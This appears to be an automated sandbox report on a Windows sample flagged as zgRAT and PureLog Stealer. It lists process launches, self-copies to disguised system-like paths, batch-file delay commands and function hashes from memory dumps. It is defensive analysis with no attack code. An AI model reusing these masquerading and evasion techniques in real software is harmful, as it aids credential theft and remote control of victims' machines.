MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	20:09:59
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	20:09:59
Start date:	11/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff702500000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	20:09:59
Start date:	11/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff715540000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	20:09:59
Start date:	11/01/2025
Path:	C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\msecache\TDdwNhXdQzDImnznNSm.exe"
Imagebase:	0xa0000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	20:10:00
Start date:	11/01/2025
Path:	C:\Recovery\ctfmon.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\ctfmon.exe"
Imagebase:	0x7e0000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	20:10:03
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\msecache\TDdwNhXdQzDImnznNSm.exe"
Imagebase:	0x7ff68b930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	20:10:03
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	20:10:03
Start date:	11/01/2025
Path:	C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\msecache\TDdwNhXdQzDImnznNSm.exe"
Imagebase:	0x9c0000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	20:10:06
Start date:	11/01/2025
Path:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Imagebase:	0xff0000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	20:10:08
Start date:	11/01/2025
Path:	C:\Recovery\ctfmon.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\ctfmon.exe"
Imagebase:	0x20000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	20:10:16
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\VIyu4dC9CU.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\VIyu4dC9CU.exe"
Imagebase:	0xc30000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	20:10:19
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c "C:\Users\user\Desktop\VIyu4dC9CU.exe"
Imagebase:	0x7ff68b930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	20:10:19
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	20:10:19
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\VIyu4dC9CU.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\VIyu4dC9CU.exe
Imagebase:	0x210000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	20:10:24
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7z2CYqkT7L.bat"
Imagebase:	0x7ff68b930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	20:10:24
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	20:10:24
Start date:	11/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff702500000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	20:10:24
Start date:	11/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff715540000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	20:10:25
Start date:	11/01/2025
Path:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Imagebase:	0xe60000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	20:10:28
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Imagebase:	0x7ff68b930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2848, Parent PID: 5204

General

Target ID:	55
Start time:	20:10:28
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	20:10:28
Start date:	11/01/2025
Path:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Imagebase:	0xba0000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	20:10:33
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat"
Imagebase:	0x7ff68b930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	20:10:33
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	20:10:33
Start date:	11/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff702500000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FFAAC7B0D47 Relevance: 1.5, Strings: 1, Instructions: 267COMMON

Download Yara Rule

Strings

5Z_H, xrefs: 00007FFAAC7B0DF3

Memory Dump Source

Source File: 00000000.00000002.1303454988.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac7b0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID: 5Z_H
API String ID: 0-3267294416
Opcode ID: 513a3d73e9934d49beded2f2b1bb66fc9b3267b4a31459bf8c485c5efd68cb1b
Instruction ID: 8dab19466c8970b29a51196eb353aa9224841374d3ddcebc589cd3de445c23a8
Opcode Fuzzy Hash: 513a3d73e9934d49beded2f2b1bb66fc9b3267b4a31459bf8c485c5efd68cb1b
Instruction Fuzzy Hash: F691F4B1A19A898FE745DBACC8697A87FE1FB96314F0041BED04ED76E2CB785424C740

Function 00007FFAACBB2C49 Relevance: 1.6, Strings: 1, Instructions: 382COMMON

Download Yara Rule

Strings

p]%, xrefs: 00007FFAACBB2C38

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID: p]%
API String ID: 0-641334170
Opcode ID: 99748dc624a4af4391eb6f9c09dfb820bf24fd06f0314bf18b0136953ad0bde7
Instruction ID: e3cdec175409ed717c8396151006dbb7a7d04b87ea8dad78542b2db2f8d6c22e
Opcode Fuzzy Hash: 99748dc624a4af4391eb6f9c09dfb820bf24fd06f0314bf18b0136953ad0bde7
Instruction Fuzzy Hash: 48D18231909929CFEBA8DB08C895AA877E1FF55311F5041B9E01EC7693DE29EC49CBC1

Function 00007FFAACBB29D0 Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

0#%, xrefs: 00007FFAACBB2B2A

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID: 0#%
API String ID: 0-3812812541
Opcode ID: a927501b2ecf8e6ad8309299ce21bdb6248265d0b1eca95eb97354d4377c9ee4
Instruction ID: be49ef2a6c6d630fcf4240c3076cecd09da5fd01e774c25801ba41ec77de7433
Opcode Fuzzy Hash: a927501b2ecf8e6ad8309299ce21bdb6248265d0b1eca95eb97354d4377c9ee4
Instruction Fuzzy Hash: F1919431618A1D8FEB58DF18C895AB9B3E2FF95314B5581A9D04EC7262CE35EC42CB81

Function 00007FFAACBBA0B2 Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

, xrefs: 00007FFAACBBA122

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 48e0837cb5cffede690fa9ce3e4e4d1c3490517a1f12c9cbfb68e784c81b2579
Instruction ID: 3178376f08359494201d5260c2d959e5f4ec634c31c9410f76c8a7cc22524198
Opcode Fuzzy Hash: 48e0837cb5cffede690fa9ce3e4e4d1c3490517a1f12c9cbfb68e784c81b2579
Instruction Fuzzy Hash: 68515C70D0965ADFEB59DB98C4955BCB7B1FF46300F5081B9D01EE7282CA3AA909CB90

Function 00007FFAACBB4A48 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

, xrefs: 00007FFAACBB4AB2

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 176443a362495202934afd7cfb145c233a8ae862c857f83f75338dbba82fc17c
Instruction ID: 3f21015087a5dcff2ea1f09b00431c4a8484f5177af0fc1112c8f67270e350a0
Opcode Fuzzy Hash: 176443a362495202934afd7cfb145c233a8ae862c857f83f75338dbba82fc17c
Instruction Fuzzy Hash: A5411570D1961ACFEB19DB94C4959FDBBB1FF46300F1080AAD01EA7296CE39A905CF84

Function 00007FFAACBBDB0D Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

J_H, xrefs: 00007FFAACBBDB63

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID: J_H
API String ID: 0-2551282735
Opcode ID: a1514650af974428417a011f23bb4bf2b04cbe8f59d087ab152fe667215d2338
Instruction ID: 58a8c8baa7d0cc39b7bfc560b36cfd0608436d2954d98019e91d79335c0059fc
Opcode Fuzzy Hash: a1514650af974428417a011f23bb4bf2b04cbe8f59d087ab152fe667215d2338
Instruction Fuzzy Hash: FF314E71A0991A8FEB49DB58D491ABCFBA2FF55310B148139D01E9B683CF25F81687C0

Function 00007FFAACBB4CAF Relevance: .4, Instructions: 376COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f326a302673e7e1e99e45e8adc8a75f22c9d30b177d1fb0173d9530c7679430
Instruction ID: b6e77f87620288b218474066bf8707e3bec14462a74239a181a528c5485a709f
Opcode Fuzzy Hash: 8f326a302673e7e1e99e45e8adc8a75f22c9d30b177d1fb0173d9530c7679430
Instruction Fuzzy Hash: 86D18F305196658FEB49CF18C4E45B53BA1FF46310B5485BDC84F8B68BCA39E88ACBC1

Function 00007FFAACBB4CCF Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 836e4755170ada924182e5c24962be4c70da224bdd9004846c7e9eaefdd063a1
Instruction ID: b9b47bb5854150b9b556ba17b93d70f07ad03afa61c9e6d714932a9f89432096
Opcode Fuzzy Hash: 836e4755170ada924182e5c24962be4c70da224bdd9004846c7e9eaefdd063a1
Instruction Fuzzy Hash: 91C1807051A665CFEB09CF18D4E05B537A1FF46310B5485BDD88F8B68BCA29E889CBC1

Function 00007FFAACBB4562 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3fe198ff5ca7ed065017f3fbbcbd562b0615a38207d7bf4896c87a3b94a0de8
Instruction ID: 893cbbb456861f0cbfa619943d6b139565c00c431897d1fb1da2c9b7920c3bb1
Opcode Fuzzy Hash: c3fe198ff5ca7ed065017f3fbbcbd562b0615a38207d7bf4896c87a3b94a0de8
Instruction Fuzzy Hash: A6C18C70A19A968FE749DB18C4916E4BBA1FF5A300F5481B9C04EC7A87DF29F855CBC0

Function 00007FFAACBB9C2A Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3b8ac5b49fb834f078b02137312c6d4025623cddb19294007505bd47ff06b1
Instruction ID: de34fb88a888a96a5663a63da9bcbec2c54f88a93fc85332a32c3b61bc5daeaa
Opcode Fuzzy Hash: 4f3b8ac5b49fb834f078b02137312c6d4025623cddb19294007505bd47ff06b1
Instruction Fuzzy Hash: BFC1A07091DA969FE749DB28C0916A4BBB1FF46310F5481B9D04ECBA87CB29F859C7C0

Function 00007FFAACBBA43A Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f470a392a9863bc815ebeb88b6b847b046c0d86781b479a28133ff8dae381411
Instruction ID: 12f49dd6da27a15c80d6c4007357ef23107d20e68ad36b453d6cb1cc8cfccc49
Opcode Fuzzy Hash: f470a392a9863bc815ebeb88b6b847b046c0d86781b479a28133ff8dae381411
Instruction Fuzzy Hash: B1B180709196668FEB49CF18C0D46B437A1FF56310B5486BDD84F8B68BDA39F885CB80

Function 00007FFAACBB1F75 Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f2370a04bf802a9a06135f6c5c5b4f632aaf1e8182e72403b3cced8e1bc0508
Instruction ID: 98f21227c867e0268c3fe2510093570a7d13d2a914c5f8831f2be56824868718
Opcode Fuzzy Hash: 2f2370a04bf802a9a06135f6c5c5b4f632aaf1e8182e72403b3cced8e1bc0508
Instruction Fuzzy Hash: FE11E155DCF2B3CAF6794368D8250BC69406F43710F2881BAD65E8A1D3CC4EA84D93D3

Function 00007FFAACBB3A96 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b184fad7bb295efd415e4296d75f7407e8fd8ef5e8320233e051e68e6685354
Instruction ID: 05561e086105c9714c6382b15ad2e72b1fb5b0e9b6d69ff89f5db5a1447583a4
Opcode Fuzzy Hash: 6b184fad7bb295efd415e4296d75f7407e8fd8ef5e8320233e051e68e6685354
Instruction Fuzzy Hash: 7581DF72A4EB528BF3689B6CD8555B57BD0EF42310B14857ED48F871C3DE2AF80A8781

Function 00007FFAACBBB360 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91ccfc5acd8d339fd5df11131409d27919b5ea3eda2a1ec93f04705a1fa33395
Instruction ID: c4966024fcb735e45fac621d74b93ed9d14d20b085bf7c4853d24536296c5342
Opcode Fuzzy Hash: 91ccfc5acd8d339fd5df11131409d27919b5ea3eda2a1ec93f04705a1fa33395
Instruction Fuzzy Hash: F191E03090AB16CFE369DB14D19567577E1FF46300B10857DC48EC7A93CA6AF84ACB81

Function 00007FFAACBB1BF9 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afe260bf45a7b935b926c0f59e004a3d73dc99caabd36a4e385ab2be9e82ce19
Instruction ID: 6fea34357dcee793df9a02a77ee5efe460fff4fffdf7dd33718552fbe94519b4
Opcode Fuzzy Hash: afe260bf45a7b935b926c0f59e004a3d73dc99caabd36a4e385ab2be9e82ce19
Instruction Fuzzy Hash: 2571023190E96A8FFB68DB18C8565B437D0FF46311B1042B9D09ECB5B3DA1AE81E87C1

Function 00007FFAACBB02B9 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 778deb7b7e889dc9319a9ceffd13852203a95fd438977976832bd9557e296395
Instruction ID: dc081c5c5f087c2f78864b281fdfd83fd89642df316fe60b55dd1dcf721fd678
Opcode Fuzzy Hash: 778deb7b7e889dc9319a9ceffd13852203a95fd438977976832bd9557e296395
Instruction Fuzzy Hash: 347148B150E5598FF768DB18E49A5BA77D0EF4A310B04C2B9D09EC7563DA1AE80E83C1

Function 00007FFAACBB72C9 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35531aadaf597fdc1493f02d8706ee79500ca0a7c3dbd2c7a8b859209441a433
Instruction ID: 690ff1ed15c838d649cc51cf5899b284c27dc5e7cd2101c91d6bac864284cfe3
Opcode Fuzzy Hash: 35531aadaf597fdc1493f02d8706ee79500ca0a7c3dbd2c7a8b859209441a433
Instruction Fuzzy Hash: F771633190E859CFF768DB18C8465B97BC0EF46311B1042B9D48ED36A3DA1AE84F83E1

Function 00007FFAACBB912B Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb332c4bf447f3f5424433038fd2486b00942301d947cdf5a7c49af8efa5de8b
Instruction ID: 207913dbaa8df30636ee0b7d81db68b2795f5ed0d3689d91036c31a293eb729d
Opcode Fuzzy Hash: cb332c4bf447f3f5424433038fd2486b00942301d947cdf5a7c49af8efa5de8b
Instruction Fuzzy Hash: 4171D071E4EA56CFF3689B28D4456B977E1EF46320B14857ED08E83583DA2AF40A8681

Function 00007FFAACBBC269 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2174f2f00350a5719310bf0581b2f844da5bb99f7d6977a51ebde63df994d4af
Instruction ID: e172265da8eae0c0389e946c6a4528bf67dbab7e737812e4040161225c8a956a
Opcode Fuzzy Hash: 2174f2f00350a5719310bf0581b2f844da5bb99f7d6977a51ebde63df994d4af
Instruction Fuzzy Hash: AE71373190E959CFF768DB18C8465BA37D0FF46311B5442B9D09EC75A3DA2AE80E87C2

Function 00007FFAACBB7E8B Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d60b67daee23522c304e83579fba157ad8189a77d0ddc60793dbd431c6bec7b
